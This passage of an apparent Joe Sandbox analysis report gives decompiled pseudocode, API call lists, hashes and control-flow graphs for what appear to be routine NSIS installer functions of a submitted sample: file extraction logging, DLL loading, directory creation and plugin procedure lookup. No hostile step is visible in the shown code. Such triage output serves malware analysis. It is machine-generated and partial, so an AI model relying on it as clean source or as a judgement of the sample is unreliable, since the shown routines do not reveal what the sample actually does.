                                                                                      						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                                                      						__eflags =  *(_t86 + 8) - 2;
                                                                                      						if(__eflags == 0) {
                                                                                      							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                      						}
                                                                                      						L31:
                                                                                      						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                                                      						__eflags =  *0x434f88;
                                                                                      						goto L32;
                                                                                      					} else {
                                                                                      						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp", _t83);
                                                                                      						E0040653D(_t83, _t81);
                                                                                      						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                      						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp");
                                                                                      						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                                                      						__eflags = _t64;
                                                                                      						if(_t64 == 0) {
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							__eflags = _t64 == 1;
                                                                                      							if(_t64 == 1) {
                                                                                      								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                                                      								L32:
                                                                                      								_t51 = 0;
                                                                                      								__eflags = 0;
                                                                                      							} else {
                                                                                      								_push(_t81);
                                                                                      								_push(0xfffffffa);
                                                                                      								E0040559F();
                                                                                      								L29:
                                                                                      								_t51 = 0x7fffffff;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					L33:
                                                                                      					return _t51;
                                                                                      				}
                                                                                      				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                                                                      				 *0x434fb4 =  *0x434fb4 + 1;
                                                                                      				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                      				 *0x434fb4 =  *0x434fb4 - 1;
                                                                                      				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                      				_t84 = _t45;
                                                                                      				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                      					L22:
                                                                                      					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                      				} else {
                                                                                      					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                      					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                      						goto L22;
                                                                                      					}
                                                                                      				}
                                                                                      				CloseHandle( *(_t86 - 0x38)); // executed
                                                                                      				__eflags = _t84 - _t77;
                                                                                      				if(_t84 >= _t77) {
                                                                                      					goto L31;
                                                                                      				} else {
                                                                                      					__eflags = _t84 - 0xfffffffe;
                                                                                      					if(_t84 != 0xfffffffe) {
                                                                                      						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                      					} else {
                                                                                      						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                      						lstrcatW(_t81,  *(_t86 - 8));
                                                                                      					}
                                                                                      					_push(0x200010);
                                                                                      					_push(_t81);
                                                                                      					E00405B9D();
                                                                                      					goto L29;
                                                                                      				}
                                                                                      				goto L33;
                                                                                      			}



















                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                                                        • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                        • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00403418), ref: 004055FA
                                                                                        • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll), ref: 0040560C
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso9723.tmp$C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll$Call
                                                                                      • API String ID: 1941528284-4111424966
                                                                                      • Opcode ID: b846e77228e1b4e43f56e55ae5b811970dee6f5a8eaf3a28d2e19650d54a60a9
                                                                                      • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                      • Opcode Fuzzy Hash: b846e77228e1b4e43f56e55ae5b811970dee6f5a8eaf3a28d2e19650d54a60a9
                                                                                      • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 856 40559f-4055b4 857 4055ba-4055cb 856->857 858 40566b-40566f 856->858 859 4055d6-4055e2 lstrlenW 857->859 860 4055cd-4055d1 call 40657a 857->860 862 4055e4-4055f4 lstrlenW 859->862 863 4055ff-405603 859->863 860->859 862->858 864 4055f6-4055fa lstrcatW 862->864 865 405612-405616 863->865 866 405605-40560c SetWindowTextW 863->866 864->863 867 405618-40565a SendMessageW * 3 865->867 868 40565c-40565e 865->868 866->865 867->868 868->858 869 405660-405663 868->869 869->858
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040559F(signed int _a4, WCHAR* _a8) {
                                                                                      				struct HWND__* _v8;
                                                                                      				signed int _v12;
                                                                                      				WCHAR* _v32;
                                                                                      				long _v44;
                                                                                      				int _v48;
                                                                                      				void* _v52;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				WCHAR* _t27;
                                                                                      				signed int _t28;
                                                                                      				long _t29;
                                                                                      				signed int _t37;
                                                                                      				signed int _t38;
                                                                                      
                                                                                      				_t27 =  *0x433ee4;
                                                                                      				_v8 = _t27;
                                                                                      				if(_t27 != 0) {
                                                                                      					_t37 =  *0x434fb4;
                                                                                      					_v12 = _t37;
                                                                                      					_t38 = _t37 & 0x00000001;
                                                                                      					if(_t38 == 0) {
                                                                                      						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                                                      					}
                                                                                      					_t27 = lstrlenW(0x42c248);
                                                                                      					_a4 = _t27;
                                                                                      					if(_a8 == 0) {
                                                                                      						L6:
                                                                                      						if((_v12 & 0x00000004) == 0) {
                                                                                      							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                                                      						}
                                                                                      						if((_v12 & 0x00000002) == 0) {
                                                                                      							_v32 = 0x42c248;
                                                                                      							_v52 = 1;
                                                                                      							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                                      							_v44 = 0;
                                                                                      							_v48 = _t29 - _t38;
                                                                                      							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                                      							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                                      						}
                                                                                      						if(_t38 != 0) {
                                                                                      							_t28 = _a4;
                                                                                      							0x42c248[_t28] = 0;
                                                                                      							return _t28;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t27 = lstrlenW(_a8) + _a4;
                                                                                      						if(_t27 < 0x1000) {
                                                                                      							_t27 = lstrcatW(0x42c248, _a8);
                                                                                      							goto L6;
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t27;
                                                                                      			}


















                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                      • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00403418), ref: 004055FA
                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll), ref: 0040560C
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                        • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                        • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000), ref: 00406779
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll
                                                                                      • API String ID: 1495540970-689062111
                                                                                      • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                      • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                      • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                      • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 870 40689a-4068ba GetSystemDirectoryW 871 4068bc 870->871 872 4068be-4068c0 870->872 871->872 873 4068d1-4068d3 872->873 874 4068c2-4068cb 872->874 876 4068d4-406907 wsprintfW LoadLibraryExW 873->876 874->873 875 4068cd-4068cf 874->875 875->876
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040689A(intOrPtr _a4) {
                                                                                      				short _v576;
                                                                                      				signed int _t13;
                                                                                      				struct HINSTANCE__* _t17;
                                                                                      				signed int _t19;
                                                                                      				void* _t24;
                                                                                      
                                                                                      				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                      				if(_t13 > 0x104) {
                                                                                      					_t13 = 0;
                                                                                      				}
                                                                                      				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                      					_t19 = 1;
                                                                                      				} else {
                                                                                      					_t19 = 0;
                                                                                      				}
                                                                                      				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                      				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                      				return _t17;
                                                                                      			}









                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                      • wsprintfW.USER32 ref: 004068EC
                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                      • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                      • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                      • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 877 405a6e-405ab9 CreateDirectoryW 878 405abb-405abd 877->878 879 405abf-405acc GetLastError 877->879 880 405ae6-405ae8 878->880 879->880 881 405ace-405ae2 SetFileSecurityW 879->881 881->878 882 405ae4 GetLastError 881->882 882->880
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405A6E(WCHAR* _a4) {
                                                                                      				struct _SECURITY_ATTRIBUTES _v16;
                                                                                      				struct _SECURITY_DESCRIPTOR _v36;
                                                                                      				int _t22;
                                                                                      				long _t23;
                                                                                      
                                                                                      				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                      				_v36.Owner = 0x4083f8;
                                                                                      				_v36.Group = 0x4083f8;
                                                                                      				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                      				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                      				_v16.lpSecurityDescriptor =  &_v36;
                                                                                      				_v36.Revision = 1;
                                                                                      				_v36.Control = 4;
                                                                                      				_v36.Dacl = 0x4083e8;
                                                                                      				_v16.nLength = 0xc;
                                                                                      				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                      				if(_t22 != 0) {
                                                                                      					L1:
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t23 = GetLastError();
                                                                                      				if(_t23 == 0xb7) {
                                                                                      					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					return GetLastError();
                                                                                      				}
                                                                                      				return _t23;
                                                                                      			}








                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                      • GetLastError.KERNEL32 ref: 00405AC5
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                      • GetLastError.KERNEL32 ref: 00405AE4
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 3449924974-3355392842
                                                                                      • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                      • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                      • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                      • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      C-Code - Quality: 100%
                                                                                      			E710316BD(struct HINSTANCE__* _a4, short* _a8) {
                                                                                      				_Unknown_base(*)()* _t7;
                                                                                      				void* _t10;
                                                                                      				int _t14;
                                                                                      
                                                                                      				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                      				_t10 = GlobalAlloc(0x40, _t14);
                                                                                      				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                      				_t7 = GetProcAddress(_a4, _t10); // executed
                                                                                      				GlobalFree(_t10);
                                                                                      				return _t7;
                                                                                      			}







                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,710322D8,?,00000808), ref: 710316D5
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,710322D8,?,00000808), ref: 710316DC
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,710322D8,?,00000808), ref: 710316F0
                                                                                      • GetProcAddress.KERNEL32(710322D8,00000000), ref: 710316F7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71031700
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: a7e203e1b8ceb8050c43063ab687b2bb4f6e20ddcd1cd7d73e2f8269e14c075e
                                                                                      • Instruction ID: 35b11402b8999a8108906bd7c8d0e657a09f6ecc34aeff372dd2f50c4f0c3e40
                                                                                      • Opcode Fuzzy Hash: a7e203e1b8ceb8050c43063ab687b2bb4f6e20ddcd1cd7d73e2f8269e14c075e
                                                                                      • Instruction Fuzzy Hash: C1F0AC7320A1387FD62116A78C4CD9BBE9CDF8B2F5B210615F628D619086765D01D7F1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 928 71031817-71031856 call 71031bff 932 71031976-71031978 928->932 933 7103185c-71031860 928->933 934 71031862-71031868 call 7103243e 933->934 935 71031869-71031876 call 71032480 933->935 934->935 940 710318a6-710318ad 935->940 941 71031878-7103187d 935->941 942 710318af-710318cb call 71032655 call 71031654 call 71031312 GlobalFree 940->942 943 710318cd-710318d1 940->943 944 71031898-7103189b 941->944 945 7103187f-71031880 941->945 965 71031925-71031929 942->965 949 710318d3-7103191c call 71031666 call 71032655 943->949 950 7103191e-71031924 call 71032655 943->950 944->940 951 7103189d-7103189e call 71032e23 944->951 947 71031882-71031883 945->947 948 71031888-71031889 call 71032b98 945->948 953 71031890-71031896 call 71032810 947->953 954 71031885-71031886 947->954 961 7103188e 948->961 949->965 950->965 964 710318a3 951->964 969 710318a5 953->969 954->940 954->948 961->964 964->969 970 71031966-7103196d 965->970 971 7103192b-71031939 call 71032618 965->971 969->940 970->932 976 7103196f-71031970 GlobalFree 970->976 978 71031951-71031958 971->978 979 7103193b-7103193e 971->979 976->932 978->970 981 7103195a-71031965 call 710315dd 978->981 979->978 980 71031940-71031948 979->980 980->978 982 7103194a-7103194b FreeLibrary 980->982 981->970 982->978
                                                                                      C-Code - Quality: 88%
                                                                                      			E71031817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                      				void _v36;
                                                                                      				char _v136;
                                                                                      				struct HINSTANCE__* _t37;
                                                                                      				intOrPtr _t42;
                                                                                      				void* _t48;
                                                                                      				void* _t49;
                                                                                      				void* _t50;
                                                                                      				void* _t54;
                                                                                      				intOrPtr _t57;
                                                                                      				signed int _t61;
                                                                                      				signed int _t63;
                                                                                      				void* _t67;
                                                                                      				void* _t68;
                                                                                      				void* _t72;
                                                                                      				void* _t76;
                                                                                      
                                                                                      				_t76 = __esi;
                                                                                      				_t68 = __edi;
                                                                                      				_t67 = __edx;
                                                                                      				 *0x7103506c = _a8;
                                                                                      				 *0x71035070 = _a16;
                                                                                      				 *0x71035074 = _a12;
                                                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x71035048, E71031651);
                                                                                      				_push(1); // executed
                                                                                      				_t37 = E71031BFF(); // executed
                                                                                      				_t54 = _t37;
                                                                                      				if(_t54 == 0) {
                                                                                      					L28:
                                                                                      					return _t37;
                                                                                      				} else {
                                                                                      					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                      						E7103243E(_t54);
                                                                                      					}
                                                                                      					_push(_t54);
                                                                                      					E71032480(_t67);
                                                                                      					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                      					if(_t57 == 0xffffffff) {
                                                                                      						L14:
                                                                                      						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                                      							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                      								_push(_t54);
                                                                                      								_t37 = E71032655();
                                                                                      							} else {
                                                                                      								_push(_t76);
                                                                                      								_push(_t68);
                                                                                      								_t61 = 8;
                                                                                      								_t13 = _t54 + 0x1018; // 0x1018
                                                                                      								memcpy( &_v36, _t13, _t61 << 2);
                                                                                      								_t42 = E71031666(_t54,  &_v136);
                                                                                      								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                                      								_t18 = _t54 + 0x1018; // 0x1018
                                                                                      								_t72 = _t18;
                                                                                      								_push(_t54);
                                                                                      								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                                      								 *_t72 = 4;
                                                                                      								E71032655();
                                                                                      								_t63 = 8;
                                                                                      								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                      							}
                                                                                      						} else {
                                                                                      							_push(_t54);
                                                                                      							E71032655();
                                                                                      							_t37 = GlobalFree(E71031312(E71031654(_t54)));
                                                                                      						}
                                                                                      						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                      							_t37 = E71032618(_t54);
                                                                                      							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                      								_t37 =  *(_t54 + 0x1008);
                                                                                      								if(_t37 != 0) {
                                                                                      									_t37 = FreeLibrary(_t37);
                                                                                      								}
                                                                                      							}
                                                                                      							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                                      								_t37 = E710315DD( *0x71035068);
                                                                                      							}
                                                                                      						}
                                                                                      						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                                      							goto L28;
                                                                                      						} else {
                                                                                      							return GlobalFree(_t54);
                                                                                      						}
                                                                                      					}
                                                                                      					_t48 =  *_t54;
                                                                                      					if(_t48 == 0) {
                                                                                      						if(_t57 != 1) {
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						E71032E23(_t54);
                                                                                      						L12:
                                                                                      						_t54 = _t48;
                                                                                      						L13:
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					_t49 = _t48 - 1;
                                                                                      					if(_t49 == 0) {
                                                                                      						L8:
                                                                                      						_t48 = E71032B98(_t57, _t54); // executed
                                                                                      						goto L12;
                                                                                      					}
                                                                                      					_t50 = _t49 - 1;
                                                                                      					if(_t50 == 0) {
                                                                                      						E71032810(_t54);
                                                                                      						goto L13;
                                                                                      					}
                                                                                      					if(_t50 != 1) {
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					goto L8;
                                                                                      				}
                                                                                      			}



















                                                                                      APIs
                                                                                        • Part of subcall function 71031BFF: GlobalFree.KERNEL32(?), ref: 71031E74
                                                                                        • Part of subcall function 71031BFF: GlobalFree.KERNEL32(?), ref: 71031E79
                                                                                        • Part of subcall function 71031BFF: GlobalFree.KERNEL32(?), ref: 71031E7E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 710318C5
                                                                                      • FreeLibrary.KERNEL32(?), ref: 7103194B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71031970
                                                                                        • Part of subcall function 7103243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7103246F
                                                                                        • Part of subcall function 71032810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,71031896,00000000), ref: 710328E0
                                                                                        • Part of subcall function 71031666: wsprintfW.USER32 ref: 71031694
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3962662361-3916222277
                                                                                      • Opcode ID: 702410d26f3b6d217afb69df6619860b7f93875fb220154247f6bf6a567c3ef8
                                                                                      • Instruction ID: 3062133095fd7dbdc0a4302704b0593ef2f1df06e17e7b4e00efef40d9336839
                                                                                      • Opcode Fuzzy Hash: 702410d26f3b6d217afb69df6619860b7f93875fb220154247f6bf6a567c3ef8
                                                                                      • Instruction Fuzzy Hash: FC41D372900206ABDB019F70DC88B997BFDBF8DB10F9444AEFA469E086DB75D084C760
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 985 40248a-4024bb call 402da6 * 2 call 402e36 992 4024c1-4024cb 985->992 993 402c2a-402c39 985->993 995 4024cd-4024da call 402da6 lstrlenW 992->995 996 4024de-4024e1 992->996 995->996 999 4024e3-4024f4 call 402d84 996->999 1000 4024f5-4024f8 996->1000 999->1000 1001 402509-40251d RegSetValueExW 1000->1001 1002 4024fa-402504 call 4032b4 1000->1002 1006 402522-402603 RegCloseKey 1001->1006 1007 40251f 1001->1007 1002->1001 1006->993 1007->1006
                                                                                      C-Code - Quality: 83%
                                                                                      			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                                                      				void* _t20;
                                                                                      				void* _t21;
                                                                                      				int _t24;
                                                                                      				long _t25;
                                                                                      				int _t30;
                                                                                      				intOrPtr _t33;
                                                                                      				void* _t34;
                                                                                      				intOrPtr _t37;
                                                                                      				void* _t39;
                                                                                      				void* _t42;
                                                                                      
                                                                                      				_t42 = __eflags;
                                                                                      				_t33 = __edx;
                                                                                      				_t30 = __ebx;
                                                                                      				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                                      				_t34 = __eax;
